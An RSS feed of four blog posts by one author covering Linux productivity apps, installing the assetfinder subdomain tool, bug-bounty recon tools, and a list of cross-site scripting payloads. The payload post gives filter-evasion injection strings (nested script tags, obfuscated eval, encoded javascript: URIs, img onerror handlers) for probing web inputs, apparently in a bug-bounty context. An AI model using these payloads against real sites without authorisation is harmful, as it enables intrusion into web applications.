<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: vala broumand</title>
    <description>The latest articles on Forem by vala broumand (@vabro).</description>
    <link>https://forem.com/vabro</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F778287%2F0d7c21d1-468d-4b23-8e8c-c87573082364.jpg</url>
      <title>Forem: vala broumand</title>
      <link>https://forem.com/vabro</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/vabro"/>
    <language>en</language>
    <item>
      <title>top 3 linux apps for productivity 🐧</title>
      <dc:creator>vala broumand</dc:creator>
      <pubDate>Sat, 14 Jan 2023 08:53:27 +0000</pubDate>
      <link>https://forem.com/vabro/top-3-linux-apps-for-productivity-2ab2</link>
      <guid>https://forem.com/vabro/top-3-linux-apps-for-productivity-2ab2</guid>
      <description>&lt;p&gt;Hi everyone , i hope you have a great day :) in this post i will introduce you cool apps for your productivity progress. ok let's get started!&lt;/p&gt;

&lt;h2&gt;
  
  
  1- Ora
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;Ora is a Task management and team collaboration app with &lt;br&gt;
very cool features, this will help you improve your teamwork skills.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft06aswpytjz1pz63oprk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft06aswpytjz1pz63oprk.png" alt="Ora Official website" width="800" height="467"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;how to install? (it easy with snap)&lt;br&gt;
&lt;code&gt;sudo snap install ora&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://ora.pm/" rel="noopener noreferrer"&gt;Official Website&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  2- Zenkit
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;A platform for collaboration and project management.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffmod742i0k6ob1e2gbhs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffmod742i0k6ob1e2gbhs.png" alt="offcial web" width="800" height="360"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;how to install ?&lt;br&gt;
&lt;code&gt;sudo snap install zenkit&lt;/code&gt;&lt;br&gt;
&lt;a href="https://zenkit.com/en/base/" rel="noopener noreferrer"&gt;Official website&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  3- Drawio
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;drawio is a tool for drawing flowcharts and diagrams and more....&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F806xwsyj9lqc5k5dsy9o.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F806xwsyj9lqc5k5dsy9o.png" alt="Official web" width="800" height="330"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;how to install?&lt;br&gt;
&lt;code&gt;sudo snap install drawio&lt;/code&gt; &lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.diagrams.net/" rel="noopener noreferrer"&gt;Official website&lt;/a&gt;&lt;/p&gt;

</description>
      <category>sql</category>
      <category>database</category>
      <category>programming</category>
    </item>
    <item>
      <title>how to install assetfinder tool on any linunx distro 🐧</title>
      <dc:creator>vala broumand</dc:creator>
      <pubDate>Mon, 02 Jan 2023 20:47:52 +0000</pubDate>
      <link>https://forem.com/vabro/how-to-install-assetfinder-tool-on-any-linunx-distro-353d</link>
      <guid>https://forem.com/vabro/how-to-install-assetfinder-tool-on-any-linunx-distro-353d</guid>
      <description>&lt;p&gt;With this tool we can find domains and subdomains potentially related to a given domain. this tool is greatly useful in the asset discovery proccess.&lt;/p&gt;

&lt;h2&gt;
  
  
  1- first of all we should install &lt;strong&gt;go&lt;/strong&gt; lang on our machine
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt install go-lang -y
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;the command above is for Debian Based Linux distributions, if you are using a different distro find out how to install go.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;check if the go lang installed successfully :&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go version
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;if yes you should see something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go version go1.18.1 linux/amd64
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  2- also we need &lt;strong&gt;git&lt;/strong&gt; to be installed on our machine
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo apt install git
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;check the git installation :&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;git --version
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  3-now change your directory and move to the downloads folder
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd Downloads
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  4- now we should clone the &lt;strong&gt;assetfinder&lt;/strong&gt; repository from &lt;em&gt;Tomnomnom&lt;/em&gt; github
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;git clone https://github.com/tomnomnom/assetfinder.git
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  5-now move into the &lt;em&gt;assetfinder&lt;/em&gt; directory
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd assetfinder
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  6- create a go module
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go mod init assetfinder
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  7-in this step we should build an executable go package with the command below
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;the dot sign means build the package in the current directory&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go build .
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  8- now we should move the file to bin folder so we can access &lt;em&gt;assetfinder&lt;/em&gt; from anywhere :D
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo mv &lt;/span&gt;assetfinder /usr/local/bin/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and tada we are ready to hack !🗿&lt;/p&gt;

</description>
      <category>linux</category>
      <category>security</category>
      <category>cybersecurity</category>
      <category>go</category>
    </item>
    <item>
      <title>Useful XSS Payloads</title>
      <dc:creator>vala broumand</dc:creator>
      <pubDate>Sun, 30 Oct 2022 07:34:51 +0000</pubDate>
      <link>https://forem.com/vabro/useful-xss-payloads-1b7l</link>
      <guid>https://forem.com/vabro/useful-xss-payloads-1b7l</guid>
      <description>&lt;h2&gt;
  
  
  In this post i will show top and useful xss payloads in 2022. i found xss vulnerabilities in many web apps with some of them below.
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;You can use payloads below when you are dealing with a injection that goes inside the value of a input:&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;\"-alert(1)//
\'-alert(1)//
%26apos;-alert(1)-%26apos
'-alert(1)-'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;blockquote&gt;
&lt;p&gt;Use these payloads when you are injecting inside a script tag&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;/script&amp;gt;&amp;lt;img/src/onerror=alert(1)&amp;gt;
&amp;lt;a href="javascript:var a='&amp;amp;apos;-alert(1)-&amp;amp;apos;'"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;blockquote&gt;
&lt;p&gt;And we have some common payloads here&lt;br&gt;
&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Basic payload
&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;
&amp;lt;scr&amp;lt;script&amp;gt;ipt&amp;gt;alert('XSS')&amp;lt;/scr&amp;lt;script&amp;gt;ipt&amp;gt;
"&amp;gt;&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;
"&amp;gt;&amp;lt;script&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/script&amp;gt;
&amp;lt;script&amp;gt;\u0061lert('22')&amp;lt;/script&amp;gt;
&amp;lt;script&amp;gt;eval('\x61lert(\'33\')')&amp;lt;/script&amp;gt;
&amp;lt;script&amp;gt;eval(8680439..toString(30))(983801..toString(36))&amp;lt;/script&amp;gt; //parseInt("confirm",30) == 8680439 &amp;amp;&amp;amp; 8680439..toString(30) == "confirm"
&amp;lt;object/data="jav&amp;amp;#x61;sc&amp;amp;#x72;ipt&amp;amp;#x3a;al&amp;amp;#x65;rt&amp;amp;#x28;23&amp;amp;#x29;"&amp;gt;

// Img payload
&amp;lt;img src=x onerror=alert('XSS');&amp;gt;
&amp;lt;img src=x onerror=alert('XSS')//
&amp;lt;img src=x onerror=alert(String.fromCharCode(88,83,83));&amp;gt;
&amp;lt;img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));&amp;gt;
&amp;lt;img src=x:alert(alt) onerror=eval(src) alt=xss&amp;gt;
"&amp;gt;&amp;lt;img src=x onerror=alert('XSS');&amp;gt;
"&amp;gt;&amp;lt;img src=x onerror=alert(String.fromCharCode(88,83,83));&amp;gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;blockquote&gt;
&lt;p&gt;Find Security and Bug Bounty Books in my telegram channel ==&amp;gt; &lt;/p&gt;
&lt;div class="crayons-card c-embed text-styles text-styles--secondary"&gt;
    &lt;a href="https://t.me/spi_sec" rel="noopener noreferrer"&gt;
      t.me
    &lt;/a&gt;
&lt;/div&gt;


&lt;br&gt;
&lt;/blockquote&gt;

</description>
      <category>cybersecurity</category>
      <category>security</category>
      <category>web3</category>
    </item>
    <item>
      <title>Top Recon Tools</title>
      <dc:creator>vala broumand</dc:creator>
      <pubDate>Sat, 29 Oct 2022 20:39:39 +0000</pubDate>
      <link>https://forem.com/vabro/top-recon-tools-1dgm</link>
      <guid>https://forem.com/vabro/top-recon-tools-1dgm</guid>
      <description>&lt;p&gt;top recon tools i use for information gathering for #bug_bounty:&lt;/p&gt;

&lt;h2&gt;
  
  
  Amass
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.&lt;br&gt;
&lt;a href="https://github.com/OWASP/Amass"&gt;Github Link&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Subfinder
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;subfinder is a subdomain discovery tool that returns valid subdomains for websites, using passive online sources. It has a simple, modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well.&lt;br&gt;
&lt;a href="https://github.com/projectdiscovery/subfinder"&gt;Github Link&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Nmap
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;Nmap is released under a custom license, which is based on (but not compatible with) GPLv2. The Nmap license allows free usage by end users, and we also offer a commercial license for companies that wish to redistribute Nmap technology with their products. See Nmap Copyright and Licensing for full details.&lt;br&gt;
&lt;a href="https://github.com/nmap/nmap"&gt;Github Link&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Gospider
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;GoSpider - Fast web spider written in Go&lt;br&gt;
&lt;a href="https://github.com/jaeles-project/gospider"&gt;Github Link&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Gotator
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;this has massive features , Checks domain and TLD analyzing ccSLDs to avoid going out of scope (example.com, example.com.mx, etc.).&lt;br&gt;
&lt;a href="https://github.com/Josue87/gotator"&gt;Github Link&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Httpx
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. It is designed to maintain result reliability with an increased number of threads.&lt;br&gt;
&lt;a href="https://github.com/projectdiscovery/httpx"&gt;Github Link&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Wahtweb
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Usk7adlm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l1lnkhhhkhwyugwh1clq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Usk7adlm--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l1lnkhhhkhwyugwh1clq.png" alt="Image description" width="796" height="383"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Next generation web scanner&lt;br&gt;
&lt;a href="https://github.com/urbanadventurer/WhatWeb"&gt;Github Link&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;em&gt;What tool do you use ? :)&lt;/em&gt;&lt;br&gt;
join my telegram channel for more -&amp;gt; &lt;code&gt;@spi_sec&lt;/code&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
